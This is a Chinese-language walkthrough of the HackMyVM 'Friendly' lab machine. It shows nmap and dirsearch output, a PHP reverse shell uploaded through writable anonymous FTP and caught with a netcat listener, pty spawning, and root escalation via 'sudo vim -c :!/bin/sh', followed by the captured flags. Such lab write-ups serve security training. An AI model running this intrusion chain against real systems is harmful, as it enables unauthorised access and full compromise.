[HMV] Friendly
0x00 配置
攻击机 IP: 192.168.10.24
靶机 IP: 192.168.10.23
0x01 攻击
使用 Nmap 扫描目标靶机开放的端口
┌──(root㉿Kali)-[~]
└─# nmap -sC -sV -p- 192.168.10.23
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-24 19:59 CST
Nmap scan report for 192.168.10.23
Host is up (0.00029s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 root root 10725 Feb 23 15:26 index.html
80/tcp open http Apache httpd 2.4.54 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.54 (Debian)
MAC Address: 08:00:27:A2:9F:C0 (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.55 seconds
发现了两个端口,21 (FTP) 和 80 (HTTP),没有 SSH 端口。FTP 启用了匿名登录,先看 FTP
FTP 中只有一个 index.html,没有其他任何东西。index.html 的内容只是很普通的 Debian Apache 默认页面,只在页面的最下方有一个可疑的注释,但是目前尚不明确用途。接着查看网页
这个 index.html 的页面与 FTP 中的相同,同样没有任何线索。扫描网站后台,依旧没有发现什么有用的信息
┌──(root㉿Kali)-[~]
└─# dirsearch -u http://192.168.10.23/
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927
Output File: /root/.dirsearch/reports/192.168.10.23/-_23-03-24_20-01-57.txt
Error Log: /root/.dirsearch/logs/errors-23-03-24_20-01-57.log
Target: http://192.168.10.23/
[20:01:57] Starting:
[20:01:58] 403 - 278B - /.ht_wsr.txt
[20:01:58] 403 - 278B - /.htaccess.bak1
[20:01:58] 403 - 278B - /.htaccess.orig
[20:01:58] 403 - 278B - /.htaccess.sample
[20:01:58] 403 - 278B - /.htaccess.save
[20:01:58] 403 - 278B - /.htaccess_orig
[20:01:58] 403 - 278B - /.htaccess_extra
[20:01:58] 403 - 278B - /.htaccessOLD
[20:01:58] 403 - 278B - /.htaccess_sc
[20:01:58] 403 - 278B - /.htaccessOLD2
[20:01:58] 403 - 278B - /.htaccessBAK
[20:01:58] 403 - 278B - /.html
[20:01:58] 403 - 278B - /.htm
[20:01:58] 403 - 278B - /.htpasswd_test
[20:01:58] 403 - 278B - /.httr-oauth
[20:01:58] 403 - 278B - /.htpasswds
[20:01:59] 403 - 278B - /.php
[20:02:09] 200 - 10KB - /index.html
[20:02:15] 403 - 278B - /server-status
[20:02:15] 403 - 278B - /server-status/
Task Completed
当我使用 SecLists 而不是默认的字典时,依旧没有任何收获,怀疑网页上可能真的只有一个 index.html,与 FTP 中相对应。这让我想到了可能我们对 FTP 具有写入权限,可以直接上传一个 PHP PentestMonkey 得到反弹 Shell
成功上传了 getshell.php 后,在浏览器中访问它,然后在攻击机上接收到了反弹 Shell
┌──(root㉿Kali)-[~]
└─# nc -lvnp 5001
listening on [any] 5001 ...
connect to [192.168.10.24] from (UNKNOWN) [192.168.10.23] 44706
Linux friendly 5.10.0-21-amd64 #1 SMP Debian 5.10.162-1 (2023-01-21) x86_64 GNU/Linux
08:06:13 up 7 min, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
sh: 0: can't access tty; job control turned off
$ which python3
/usr/bin/python3
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@friendly:/$ :D
获得 Shell 之后,查看靶机中存在的所有可访问的用户
www-data@friendly:/$ cat /etc/passwd | grep /bin/bash
cat /etc/passwd | grep /bin/bash
root:x:0:0:root:/root:/bin/bash
RiJaba1:x:1000:1000::/home/RiJaba1:/bin/bash
发现了一个 RiJaba1 用户,查看它的家目录权限
www-data@friendly:/$ ls -al /home
ls -al /home
total 12
drwxr-xr-x 3 root root 4096 Feb 21 07:50 .
drwxr-xr-x 18 root root 4096 Mar 11 04:00 ..
drwxr-xr-x 5 RiJaba1 RiJaba1 4096 Mar 11 04:13 RiJaba1
www-data@friendly:/$ ls -al /home/RiJaba1
ls -al /home/RiJaba1
total 24
drwxr-xr-x 5 RiJaba1 RiJaba1 4096 Mar 11 04:13 .
drwxr-xr-x 3 root root 4096 Feb 21 07:50 ..
lrwxrwxrwx 1 RiJaba1 RiJaba1 9 Feb 23 10:18 .bash_history -> /dev/null
drwxr-xr-x 2 RiJaba1 RiJaba1 4096 Mar 11 04:18 CTF
drwxr-xr-x 2 RiJaba1 RiJaba1 4096 Mar 11 03:59 Private
drwxr-xr-x 2 RiJaba1 RiJaba1 4096 Feb 21 07:54 YouTube
-r--r--r-- 1 RiJaba1 RiJaba1 33 Mar 11 04:13 user.txt
我们居然对 RiJaba1 用户的家目录具有读写权限,可以无须提权直接获得 user txt
www-data@friendly:/$ cat /home/RiJaba1/user.txt
cat /home/RiJaba1/user.txt
b8cff8c9008e1c98a1f2937b4475acd6
下一步该提权到 root 来获得 root flag 了,但我还不确定是否需要先提权到 RiJaba1。检查一番家目录后并没有发现线索
www-data@friendly:/$ ls -al /home/RiJaba1/CTF
ls -al /home/RiJaba1/CTF
total 12
drwxr-xr-x 2 RiJaba1 RiJaba1 4096 Mar 11 04:18 .
drwxr-xr-x 5 RiJaba1 RiJaba1 4096 Mar 11 04:13 ..
-r--r--r-- 1 RiJaba1 RiJaba1 21 Mar 11 04:18 ...
www-data@friendly:/$ cat "/home/RiJaba1/CTF/..."
cat "/home/RiJaba1/CTF/..."
How did you find me?
www-data@friendly:/$ ls -al /home/RiJaba1/Private
ls -al /home/RiJaba1/Private
total 12
drwxr-xr-x 2 RiJaba1 RiJaba1 4096 Mar 11 03:59 .
drwxr-xr-x 5 RiJaba1 RiJaba1 4096 Mar 11 04:13 ..
-r--r--r-- 1 RiJaba1 RiJaba1 45 Mar 11 03:59 targets.txt
www-data@friendly:/$ cat /home/RiJaba1/Private/targets.txt
cat /home/RiJaba1/Private/targets.txt
U2hlbGxEcmVkZAp4ZXJvc2VjCnNNTApib3lyYXMyMDAK
# BASE64
# ShellDredd
# xerosec
# sML
# boyras200
www-data@friendly:/$ ls -al /home/RiJaba1/YouTube
ls -al /home/RiJaba1/YouTube
total 12
drwxr-xr-x 2 RiJaba1 RiJaba1 4096 Feb 21 07:54 .
drwxr-xr-x 5 RiJaba1 RiJaba1 4096 Mar 11 04:13 ..
-r--r--r-- 1 RiJaba1 RiJaba1 41 Feb 21 07:54 ideas.txt
www-data@friendly:/$ cat /home/RiJaba1/YouTube/ideas.txt
cat /home/RiJaba1/YouTube/ideas.txt
What're you reading? Have you hacked me?
试试直接运行 sudo -l 查看我们可以运行的 sudo 命令
www-data@friendly:/$ sudo -l
sudo -l
Matching Defaults entries for www-data on friendly:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on friendly:
(ALL : ALL) NOPASSWD: /usr/bin/vim
发现了 vim!查阅 GTFObins 发现 vim 可以直接用于提权
www-data@friendly:/$ sudo vim -c ':!/bin/sh'
sudo vim -c ':!/bin/sh'
E558: Terminal entry not found in terminfo
'unknown' not known. Available builtin terminals are:
builtin_amiga
builtin_ansi
builtin_pcansi
builtin_win32
builtin_vt320
builtin_vt52
builtin_xterm
builtin_iris-ansi
builtin_debug
builtin_dumb
defaulting to 'ansi'
wlibgpm: zero screen dimension, assuming 80x25.
:!/bin/sh
# :D
查看 /root 目录下的 root flag
# ls -al /root
ls -al /root
total 28
drwx------ 3 root root 4096 Mar 11 04:14 .
drwxr-xr-x 18 root root 4096 Mar 11 04:00 ..
lrwxrwxrwx 1 root root 9 Feb 23 10:18 .bash_history -> /dev/null
-rw-r--r-- 1 root root 571 Apr 10 2021 .bashrc
drwxr-xr-x 3 root root 4096 Feb 21 06:38 .local
-rw-r--r-- 1 root root 161 Jul 9 2019 .profile
-r-xr-xr-x 1 root root 509 Mar 11 04:05 interfaces.sh
-r-------- 1 root root 24 Mar 11 04:14 root.txt
# cat /root/root.txt
cat /root/root.txt
Not yet! Find root.txt.
root flag 不在这里?在根目录下搜索 root.txt
# find / -name root.txt 2>/dev/null
find / -name root.txt 2>/dev/null
/var/log/apache2/root.txt
/root/root.txt
# cat /var/log/apache2/root.txt
cat /var/log/apache2/root.txt
66b5c58f3e83aff307441714d3e28d2f
最后我们在 /var/log/apache2 目录找到了 root.txt
0x02 总结
非常简单的靶机,一口气从头打到尾